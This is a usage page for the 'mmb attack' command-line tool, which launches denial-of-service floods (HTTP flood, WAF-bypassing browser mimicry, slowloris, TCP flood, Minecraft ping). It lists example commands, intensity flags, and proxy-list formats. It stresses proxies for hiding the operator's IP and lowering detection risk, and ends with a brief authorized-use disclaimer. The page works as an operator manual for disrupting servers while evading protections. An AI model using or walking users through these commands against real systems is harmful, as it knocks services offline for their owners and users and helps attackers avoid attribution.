Skip to main content

Overview

The mmb attack command launches network stress tests against a specified target using various attack methods. It provides real-time statistics and colored output for monitoring attack progress.

Syntax

mmb attack [method] [target] [flags]

Arguments

method
string
required
The attack method to use. Must be one of:
  • http_flood - Send random HTTP requests
  • http_bypass - Send HTTP requests that mimic real browser requests (redirects, cookies, headers, resources)
  • http_slowloris - Send slow HTTP requests and keep connections open
  • tcp_flood - Send random TCP packets
  • minecraft_ping - Send Minecraft ping/MOTD requests
target
string
required
The target URL or address to attack. Format depends on the attack method:
  • HTTP methods: http://example.com or https://example.com
  • TCP flood: http://example.com or tcp://host:port
  • Minecraft ping: minecraft.example.com:25565

Flags

--duration
integer
default:"60"
Duration of the attack in seconds. The attack will automatically stop after this time period.
mmb attack http_flood http://example.com --duration 120
--delay
integer
default:"500"
Delay between packets in milliseconds. Lower values increase attack intensity but may cause instability.
mmb attack http_flood http://example.com --delay 100
--packet-size
integer
default:"512"
Size of each packet in bytes. Larger packets consume more bandwidth per request.
mmb attack tcp_flood http://example.com --packet-size 1024
--threads
integer
default:"0"
Number of concurrent threads to use. When set to 0 (default), uses the number of CPU cores available on the system.
mmb attack http_bypass http://example.com --threads 8
--verbose
boolean
default:"false"
Enable verbose mode to show detailed attack logs, including individual request attempts and proxy usage.
mmb attack http_flood http://example.com --verbose
--no-proxy
boolean
default:"false"
Allow running the attack without proxies. By default, the CLI requires proxies from data/proxies.txt. Use this flag to bypass that requirement.
Running attacks without proxies exposes your real IP address to the target server.
mmb attack minecraft_ping minecraft.example.com:25565 --no-proxy
--config
string
Path to a custom configuration file (TOML format). If not specified, uses default configuration.
mmb attack http_flood http://example.com --config /path/to/config.toml

Output

The command displays real-time statistics during the attack:
Starting http_flood against http://example.com with 1234 proxies
15:04:05 PPS:450 Total:450 Proxies:1234
15:04:06 PPS:892 Total:1342 Proxies:1234
15:04:07 PPS:1205 Total:2547 Proxies:1234

Output Fields

  • Timestamp - Current time in HH:MM:SS format
  • PPS - Packets per second (current rate)
  • Total - Total packets sent since attack started
  • Proxies - Number of proxies being used

Verbose Mode Output

With --verbose flag enabled, additional detailed logs are shown:
Starting http_flood against http://example.com with 1234 proxies
Verbose mode enabled - showing detailed attack logs
15:04:05 PPS:450 Total:450 Proxies:1234 [proxy-1.example.com] → http://example.com
15:04:06 PPS:892 Total:1342 Proxies:1234 [proxy-2.example.com] → http://example.com

Examples

# Launch a basic HTTP flood attack with default settings
mmb attack http_flood http://example.com

Attack Methods

HTTP Flood

Sends rapid random GET/POST HTTP requests to overwhelm the target server.
mmb attack http_flood http://example.com
Best for: Basic HTTP stress testing, overwhelming server resources

HTTP Bypass

Mimics real browser behavior with realistic headers, cookies, and redirects to bypass basic protections.
mmb attack http_bypass http://example.com --duration 120
Best for: Testing WAF/DDoS protection, realistic traffic simulation

HTTP Slowloris

Sends slow HTTP requests that keep connections open, exhausting server connection pools.
mmb attack http_slowloris http://example.com
Best for: Connection exhaustion testing, low-bandwidth attacks

TCP Flood

Sends raw TCP packets with random data at the network layer.
mmb attack tcp_flood http://example.com --packet-size 1024
Best for: Network layer stress testing, protocol resilience testing

Minecraft Ping

Sends Minecraft server status/ping requests to test game server resilience.
mmb attack minecraft_ping minecraft.example.com:25565 --no-proxy
Best for: Minecraft server stress testing, MOTD request handling

Configuration

The CLI reads configuration from a TOML file (specified via --config or defaults). The configuration controls:
  • Proxies file location - Default: data/proxies.txt
  • User agents file location - Default: data/uas.txt

Proxy File Format

One proxy per line in data/proxies.txt:
http://proxy1.example.com:8080
http://user:[email protected]:3128
socks5://proxy3.example.com:1080
proxy4.example.com:8080
proxy5.example.com
Supported formats:
  • protocol://user:password@host:port - Full format with authentication
  • protocol://host:port - Without authentication
  • host:port - Uses HTTP as default protocol
  • host - Uses HTTP and port 8080 as defaults

User Agents File Format

One user agent string per line in data/uas.txt:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36

Stopping an Attack

Press Ctrl+C to gracefully stop a running attack:
15:04:05 PPS:450 Total:450 Proxies:1234
^C
Stopping...
The attack will stop immediately and clean up resources.

Error Handling

No Proxies Available

No proxies available (file: data/proxies.txt). Use --no-proxy to proceed.
Solution: Either add proxies to data/proxies.txt or use --no-proxy flag.

Unsupported Attack Method

Error: unsupported attack method
Solution: Check that the method name is correct and matches one of the supported methods.

Invalid Target Format

Error: invalid target format
Solution: Ensure the target URL/address is in the correct format for the chosen attack method.

Performance Tips

Optimize thread count: Start with default (number of CPUs) and adjust based on system performance. More threads don’t always mean better performance.
Balance delay and intensity: Lower --delay values increase attack intensity but may overwhelm your network or system. Start with defaults and decrease gradually.
Use proxies effectively: More proxies distribute load better and reduce detection risk. Ensure proxy list is fresh and working.
High-intensity attacks (low delay, many threads, large packets) can consume significant system resources and bandwidth. Monitor system performance during attacks.
This tool is for educational purposes and authorized testing only. Only use against systems you own or have explicit written permission to test. Unauthorized stress testing is illegal in most jurisdictions.

See Also

Build docs developers (and LLMs) love